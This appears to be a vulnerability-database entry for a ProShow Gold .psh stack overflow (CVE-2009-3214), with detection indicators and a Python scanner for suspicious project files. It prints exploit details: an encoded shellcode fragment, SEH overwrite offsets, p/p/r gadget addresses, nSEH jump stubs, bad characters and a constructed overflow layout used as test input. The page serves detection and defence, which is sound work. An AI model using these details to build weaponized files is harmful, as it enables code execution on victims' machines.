cbcvebase.
CVE-2009-3214
published 2009-09-16

CVE-2009-3214: Multiple stack-based buffer overflows in Photodex ProShow Gold 4.0.2549 allow remote attackers to execute arbitrary code via a crafted Slideshow project (.psh)…

Priority: P356
CVSS 2.0: 9.3 (critical), vector AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 30.79% (98.0th percentile)
Multiple stack-based buffer overflows in Photodex ProShow Gold 4.0.2549 allow remote attackers to execute arbitrary code via a crafted Slideshow project (.psh) file, related to the (1) cell[n].images[m].image and (2) cell[n].sound.file fields.

Affected (1 range)

Vendor    Product        Version range   Fixed in
photodex  proshow_gold   (not listed)    (not listed)

Detection & IOCs (extracted from sources)

  • filename: proshowsploit.psh
  • filename: msf.psh
  • string: cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg (the benign image field value used by the PoC as a reference for a normal path)
  • bytes: \xeb\x18\x90\x90 (nSEH short jump, jmp +0x18 followed by two NOPs)
  • bytes: \x01\xa6\x14\xea (the published p/p/r address 0x01a614ea in all.dnt written out byte by byte; on an x86 stack the overwritten handler pointer is stored little-endian, i.e. \xea\x14\xa6\x01)
  • bytes: \xEB\x06\x90\x90 (nSEH short jump, jmp +6 followed by two NOPs)
  • bytes: \xf9\x4c\x1a\x10 (little-endian encoding of the p/p/r address 0x101a4cf9 in if.dnt)
  • address: 0x101a4cf9 (p/p/r gadget in if.dnt, used by the Metasploit module)
  • bytes (encoded payload fragment from the PoC): \xda\xd1\xd9\x74\x24\xf4\x2b\xc9\xb1\x1e\xbd\x78\x41\xbf\x6f\x58\x83\xe8\xfc\x31\x68\x14\x03\x68\x6c\xa3\x4a\x93\x64\x67\xb5\x6c\x74\xe3\xf0\x50\xff\x8f\xff\xd0\xfe\x80\x8b\x6e\x18\xd4\xd3\x50\x19\x01\xa2\x1b\x2d\x5e\x34\xf2\x7c\xa0\xae\xa6\xfa\xe0\xa5\xb1\xc3\x2b\x48\xbf\x01\x40\xa7\x84\xd1\xb3\x4c\x8e\x3c\x30\x13\x54\xbf\xac\xca\x1f\xb3\x79\x98\x7f\xd7\x7c\x75\xf4\xfb\xf5\x88\xe0\x8a\x56\xaf\xf2\x4f\x39\x9e\x0c\x2f\x90\x84\x7b\xe9\x2c\xce\x3c\xf9\xc7\xa0\xa0\xac\x53\x28\xd1\x27\x9b\x2a\x21\x5d\x0c\x45\x52\x2b\xa8\xca\xfa\xb3\x4f\x7e\xf4\x94\x50\x98\x6a\x7b\xc3\x04\x6d
  • Malicious .psh files fill the cell[n].images[m].image field with an oversized value (6120–6151 'A' bytes in the public PoCs) to overwrite the SEH record in ProShow Gold 4.0.2549; the cell[n].sound.file field is overflowable the same way.
  • Detect .psh files in which the value of cell[n].images[m].image or cell[n].sound.file is far longer than any plausible file path (e.g., >4000 bytes); legitimate values are relative paths such as the Abstract_02.jpg example above.
  • The SEH overwrite uses a p/p/r gadget at 0x01a614ea (all.dnt) or 0x101a4cf9 (if.dnt) in ProShow Gold 4.0.2549; during crash analysis look for these addresses in the SEH chain and on the stack, remembering that x86 stores them little-endian.
  • Bad characters for payload encoding in this exploit are the null byte, newline and carriage return (\x00\x0a\x0d); a working payload embedded in a .psh file cannot contain them, so the overflow value always sits on a single line of the file.
  • The file header magic string 'Photodex(R) ProShow(TM) Show File Version=0' combined with an abnormally long cell[0].images[0].image value is a strong indicator of a weaponized .psh file.
  • The SEH overwrite offset differs between exploit variants: 6120 bytes of junk in the corelanc0d3r PoC, 6151 bytes in the hack4love variant, and 4036 bytes in the Metasploit module; the Metasploit module also targets a different p/p/r gadget (0x101a4cf9 in if.dnt) than the standalone PoCs (0x01a614ea in all.dnt).
  • The Metasploit module is a file-format module: it sets EXITFUNC=process and DisablePayloadHandler=true by default, starts no listener, and only writes the crafted .psh file, which must still be delivered to and opened by the victim in ProShow Gold.
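The detection notes above can be turned into a small scanner. The following is an added example written for this page, not code from any of the cited PoCs or from Metasploit. It assumes (which this page does not document) that a .psh file is a sequence of newline-terminated key=value lines; the header string, field names, length threshold, p/p/r addresses and nSEH stubs are the ones listed above, and both sample inputs are constructed inline (the "malicious" one uses NOPs where a real payload would go).

```python
import re

# Header string and the two overflowable field names are taken from the CVE text
# and the IOC list on this page.
PSH_MAGIC = b"Photodex(R) ProShow(TM) Show File Version=0"
VULN_FIELD = re.compile(rb"^(cell\[\d+\]\.(?:images\[\d+\]\.image|sound\.file))=(.*)$")

# p/p/r gadget addresses named above, keyed to the module that hosts them.
KNOWN_PPR = {0x01A614EA: "all.dnt", 0x101A4CF9: "if.dnt"}

# nSEH short-jump stubs from the IOC list (jmp short +6 / +0x18, then two NOPs).
NSEH_STUBS = (b"\xeb\x06\x90\x90", b"\xeb\x18\x90\x90")

# Length threshold from the detection note above; real values are file paths.
MAX_VALUE_LEN = 4000


def scan_psh(data: bytes, max_value_len: int = MAX_VALUE_LEN) -> dict:
    """Check one .psh body and return the header flag, findings and a verdict.

    Assumption (not documented on this page): a .psh file is a sequence of
    newline-terminated key=value lines. Matching line by line is safe here
    because 0x0a and 0x0d are bad characters for this bug, so a working
    overflow payload cannot span lines.
    """
    findings = []
    for raw in data.split(b"\n"):
        m = VULN_FIELD.match(raw.rstrip(b"\r"))
        if not m:
            continue
        field, value = m.group(1).decode("ascii"), m.group(2)
        if len(value) > max_value_len:
            findings.append(f"{field}: value is {len(value)} bytes (limit {max_value_len})")
        for addr, module in KNOWN_PPR.items():
            # x86 stores the overwritten SEH handler pointer little-endian,
            # so search for the reversed byte order of the published address.
            if addr.to_bytes(4, "little") in value:
                findings.append(f"{field}: p/p/r address {addr:#010x} ({module}) present")
        for stub in NSEH_STUBS:
            if stub in value:
                findings.append(f"{field}: nSEH short-jump stub {stub.hex()} present")
    return {
        "has_magic": data.startswith(PSH_MAGIC),
        "findings": findings,
        "verdict": "suspicious" if findings else "clean",
    }


def build_psh(image_value: bytes) -> bytes:
    """Constructed minimal .psh body for testing; not a real ProShow export."""
    return b"\r\n".join([
        PSH_MAGIC,
        b"cell[0].images[0].image=" + image_value,
        b"cell[0].sound.file=",
        b"",
    ])


# Benign value: the built-in background path quoted in the IOC list above.
BENIGN_VALUE = (b"../../../../../Media Sources/ProShow Gold - Built-In Content/"
                b"Backgrounds/Abstract_02.jpg")

# Constructed crash-layout value modelled on the corelanc0d3r offsets above:
# 6120 filler bytes, nSEH stub, little-endian p/p/r, then NOPs standing in for
# shellcode (no payload is included).
MALICIOUS_VALUE = (b"A" * 6120 + b"\xeb\x06\x90\x90"
                   + (0x01A614EA).to_bytes(4, "little") + b"\x90" * 32)


if __name__ == "__main__":
    for name, value in (("benign", BENIGN_VALUE), ("malicious", MALICIOUS_VALUE)):
        result = scan_psh(build_psh(value))
        print(f"{name}: {result['verdict']}")
        for finding in result["findings"]:
            print("  " + finding)
```

The length check alone catches all three published variants (4036, 6120 and 6151 bytes of filler all exceed the threshold); the address and stub checks are there to tell a known PoC layout apart from an unknown one when triaging a crash, and will miss a sample that picks a different gadget or jump.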